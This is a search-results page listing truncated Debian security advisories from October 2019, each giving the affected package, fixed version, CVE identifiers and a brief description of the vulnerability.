14407 matches found
[SECURITY] [DLA 1961-1] milkytracker security update
Package : milkytracker Version : 0.90.85+dfsg-2.2+deb8u1 CVE ID : CVE-2019-14464 CVE-2019-14496 CVE-2019-14497 Debian Bug : 933964 Fredric discovered a couple of buffer overflows in MilkyTracker, of which, a brief description is given below. CVE-2019-14464 XMFile::read in XMFile.cpp in milkyplay ...
[SECURITY] [DLA 1968-1] imagemagick security update
Package : imagemagick Version : 8:6.8.9.9-5+deb8u18 CVE ID : CVE-2019-11470 CVE-2019-14981 CVE-2019-15139 CVE-2019-15140 Multiple vulnerabilities have been found in imagemagick, an image processing toolkit. CVE-2019-11470 Uncontrolled resource consumption caused by insufficiently sanitized image...
[SECURITY] [DSA 4546-1] openjdk-11 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4546-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 20, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1966-1] aspell security update
Package : aspell Version : 0.60.720110707-1.3+deb8u1 CVE ID : CVE-2019-17544 It was discovered that Aspell, the GNU spell checker, incorrectly handled certain inputs which leads to a stack-based buffer over-read. An attacker could potentially access sensitive information. For Debian 8 "Jessie",...
[SECURITY] [DLA 1965-1] nfs-utils security update
Package : nfs-utils Version : 1.2.8-9+deb8u1 CVE ID : CVE-2019-3689 Debian Bug : 940848 In the nfs-utils package, providing support files for Network File System NFS including the rpc.statd daemon, the directory /var/lib/nfs is owned by statd:nogroup. This directory contains files owned and manag...
[SECURITY] [DSA 4545-1] mediawiki security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4545-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 18, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1963-2] poppler regression update
Package : poppler Version : 0.180.26.5-2+deb8u13 CVE ID : CVE-2019-10871 Debian Bug : 942503 The fix for CVE-2019-10871 broke xpdf. This change has been reverted until a better fix can be developed. For Debian 8 "Jessie", this problem has been fixed in version 0.180.26.5-2+deb8u13. We recommend...
[SECURITY] [DLA 1963-1] poppler security update
Package : poppler Version : 0.26.5-2+deb8u12 CVE ID : CVE-2019-9959 CVE-2019-10871 Two buffer allocation issues were identified in poppler. CVE-2019-9959 An unexpected negative length value can cause an integer overflow, which in turn making it possible to allocate a large memory chunk on the hea...
[SECURITY] [DLA 1960-1] wordpress security update
Package : wordpress Version : 4.1.27+dfsg-0+deb8u1 CVE ID : CVE-2019-16217 CVE-2019-16218 CVE-2019-16219 CVE-2019-16220 CVE-2019-16221 CVE-2019-16222 CVE-2019-16223 Debian Bug : 939543 Several cross-site scripting XSS vulnerabilities were discovered in Wordpress, a popular content management...
[SECURITY] [DLA 1964-1] sudo security update
Package : sudo Version : 1.8.10p3-1+deb8u6 CVE ID : CVE-2019-14287 Debian Bug : 942322 In sudo, a program that provides limited super user privileges to specific users, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can caus...
[SECURITY] [DLA 1714-2] libsdl2 regression update
Package : libsdl2 Version : 2.0.2+dfsg1-6+deb8u2 CVE ID : CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 The update of libsdl2 released as DLA 1714-1 led to several regressions, as reported ...
[SECURITY] [DLA 1713-2] libsdl1.2 regression update
Package : libsdl1.2 Version : 1.2.15-10+deb8u2 CVE ID : CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 The update of libsdl1.2 released as DLA 1713-1 led to a regression, caused by an...
[SECURITY] [DSA 4544-1] unbound security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4544-1 [email protected] https://www.debian.org/security/ Sebastien Delafond October 16, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4544-1] unbound security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4544-1 [email protected] https://www.debian.org/security/ Sebastien Delafond October 16, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4509-3] apache2 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4509-3 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 15, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4509-3] apache2 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4509-3 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 15, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1959-1] xtrlock security update
Package : xtrlock Version : 2.6+deb8u1 CVE ID : CVE-2016-10894 Debian Bug : 830726 It was discovered that multitouch devices were not being disabled by the "xtrlock" screen locking utility. xtrlock did not block multitouch events so an attacker could still input and thus control various programs...
[SECURITY] [DSA 4543-1] sudo security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4543-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 14, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4543-1] sudo security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4543-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 14, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1953-2] clamav regression update
Package : clamav Version : 0.101.4+dfsg-0+deb8u2 CVE ID : CVE-2019-12625 CVE-2019-12900 Debian Bug : 942172 The update of clamav released as DLA 1953-1 led to permission issues on /var/run/clamav. This caused several users to experience issues restarting the clamav daemon. This regression is caus...
[SECURITY] [DLA 1958-1] libdatetime-timezone-perl new upstream version
Package : libdatetime-timezone-perl Version : 1:1.75-2+2019c This update includes the changes in tzdata 2019c for the Perl bindings. For the list of changes, see DLA-1957-1. For Debian 8 "Jessie", this problem has been fixed in version 1:1.75-2+2019c. We recommend that you upgrade your...
[SECURITY] [DLA 1957-1] tzdata new upstream version
Package : tzdata Version : 2019c-0+deb8u1 This update includes the changes in tzdata 2018c. Notable changes are: - Brazil has canceled DST and will stay on standard time indefinitely. - Fijis next DST transitions will be 2019-11-10 and 2020-01-12 instead of 2019-11-03 and 2020-01-19. - Norfolk...
[SECURITY] [DSA 4539-3] openssl regression update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-3 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 13, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4539-3] openssl regression update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-3 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 13, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1955-1] tcpdump security update
Package : tcpdump Version : 4.9.3-1deb8u1 CVE ID : CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 CVE-2018-14879 CVE-2018-14880 CVE-2018-14881 CVE-2018-14882...
[SECURITY] [DLA 1956-1] ruby-openid security update
Package : ruby-openid Version : 2.5.0debian-1+deb8u1 CVE ID : CVE-2019-11027 ruby-openid performed discovery first, and then verification. This allowed an attacker to change the URL used for discovery and trick the server into connecting to the URL. This server in turn could be a private server n...
[SECURITY] [DLA 1954-1] lucene-solr security update
Package : lucene-solr Version : 3.6.2+dfsg-5+deb8u3 CVE ID : CVE-2019-0193 A security vulnerability was discovered in lucene-solr, an enterprise search server. The DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole...
[SECURITY] [DLA 1953-1] clamav security update
Package : clamav Version : 0.101.4+dfsg-0+deb8u1 CVE ID : CVE-2019-12625 CVE-2019-12900 Debian Bug : 34359 It was discovered that clamav, the open source antivirus engine, is affected by the following security vulnerabilities: CVE-2019-12625 Denial of Service DoS vulnerability, resulting from...
[SECURITY] [DLA 1952-1] rsyslog security update
Package : rsyslog Version : 8.4.2-1+deb8u3 CVE IDs : CVE-2019-17041 CVE-2019-17042 Debian Bugs : 942065 942067 It was discovered that there were two vulnerabilities in the rsyslog system/kernel logging daemon in the parsers for AIX and Cisco log messages respectfully. For Debian 8 "Jessie", these...
[SECURITY] [DLA 1951-1] libtomcrypt security update
Package : libtomcrypt Version : 1.17-6+deb8u1 CVE ID : CVE-2019-17362 It was discovered that there was a denial of service vulnerability in the libtomcrypt cryptographic library. An out-of-bounds read and crash could occur via carefully-crafted "DER" encoded data eg. by importing an X.509...
[SECURITY] [DLA 1950-1] openjpeg2 security update
Package : openjpeg2 Version : 2.1.0-2+deb8u8 CVE ID : CVE-2018-21010 Debian Bug : 939553 A heap buffer overflow vulnerability was discovered in openjpeg2, the open-source JPEG 2000 codec. This vulnerability is caused by insufficient validation of width and height of image components in...
[SECURITY] [DLA 1949-1] xen security update
Package : xen Version : 4.4.4lts5-0+deb8u1 CVE ID : CVE-2018-19961 CVE-2018-19962 CVE-2018-19966 XSA ID : XSA-275 XSA-280 XSA-285 XSA-287 XSA-288 Multiple vulnerabilities have been discovered in the Xen hypervisor, which could result in denial of service, informations leaks or privilege escalatio...
[SECURITY] [DSA 4539-2] openssh regression update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-2 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 07, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4539-2] openssh regression update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-2 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 07, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1948-1] ruby-mini-magick security update
Package : ruby-mini-magick Version : 3.8.1-1+deb8u1 CVE ID : CVE-2019-13574 Debian Bug : 931932 In lib/minimagick/image.rb in ruby-mini-magick, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernelopen, which accepts a | charact...
[SECURITY] [DLA 1942-2] phpbb3 regression update
This is a follow-up to DLA-1942-1. There was some confusion about the correct fix for CVE-2019-13776. The correct announcement for this DLA should have been: Package : phpbb3 Version : 3.0.12-5+deb8u4 CVE ID : CVE-2019-13776 CVE-2019-16993 CVE-2019-16993 In phpBB, includes/acp/acpbbcodes.php had...
[SECURITY] [DLA 1947-1] libreoffice security update
Package : libreoffice Version : 1:4.3.3-2+deb8u13 CVE ID : CVE-2019-9848 CVE-2019-9849 CVE-2019-9850 CVE-2019-9851 CVE-2019-9852 CVE-2019-9853 CVE-2019-9854 Several vulnerabilities were discovered in LibreOffice, the office productivity suite. CVE-2019-9848 Nils Emmerich discovered that malicious...
[SECURITY] [DSA 4542-1] jackson-databind security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4542-1 [email protected] https://www.debian.org/security/ Sebastien Delafond October 06, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4542-1] jackson-databind security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4542-1 [email protected] https://www.debian.org/security/ Sebastien Delafond October 06, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1946-1] novnc security update
Package : novnc Version : 1:0.4+dfsg+1+20131010+gitf68af8af3d-4+deb8u1 CVE ID : CVE-2017-18635 An XSS vulnerability was discovered in noVNC in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server...
[SECURITY] [DSA 4541-1] libapreq2 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4541-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 04, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4541-1] libapreq2 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4541-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 04, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1945-1] openconnect security update
Package : openconnect Version : 6.00-2+deb8u1 CVE ID : CVE-2019-16239 Debian Bug : 940871 A vulnerability was discovered by Lukas Kupczyk of the Advanced Research Team at CrowdStrike Intelligence in OpenConnect, an open client for Cisco AnyConnect, Pulse, GlobalProtect VPN. A malicious HTTP serve...
[SECURITY] [DLA 1944-1] libapreq2 security update
Package : libapreq2 Version : 2.13-4+deb8u1 CVE ID : CVE-2019-12412 Debian Bug : 939937 It was discovered that there was a remotely-exploitable null pointer dereference in libapreq2, a library for manipulating HTTP requests. For Debian 8 "Jessie", this issue has been fixed in libapreq2 version...
[SECURITY] [DLA 1943-1] jackson-databind security update
Package : jackson-databind Version : 2.4.2-2+deb8u9 CVE ID : CVE-2019-14540 CVE-2019-16335 CVE-2019-16942 CVE-2019-16943 Debian Bug : 940498 941530 More deserialization flaws were discovered in jackson-databind relating to the classes in com.zaxxer.hikari.HikariConfig,...
[SECURITY] [DSA 4509-2] subversion update
------------------------------------------------------------------------- Debian Security Advisory DSA-4509-2 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 2, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4540-1] openssl1.0 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4540-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 01, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4539-1] openssl security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 01, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1940-1] linux-4.9 security update
Package : linux-4.9 Version : 4.9.189-3+deb9u1deb8u1 CVE ID : CVE-2019-14821 CVE-2019-14835 CVE-2019-15117 CVE-2019-15118 CVE-2019-15902 Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. CVE-2019-14821...
[SECURITY] [DLA 1942-1] phpbb3 security update
Package : phpbb3 Version : 3.0.12-5+deb8u4 CVE ID : CVE-2019-16993 In phpBB, includes/acp/acpbbcodes.php had improper verification of a CSRF token on the BBCode page in the Administration Control Panel. An actual CSRF attack was possible if an attacker also managed to retrieve the session id of a...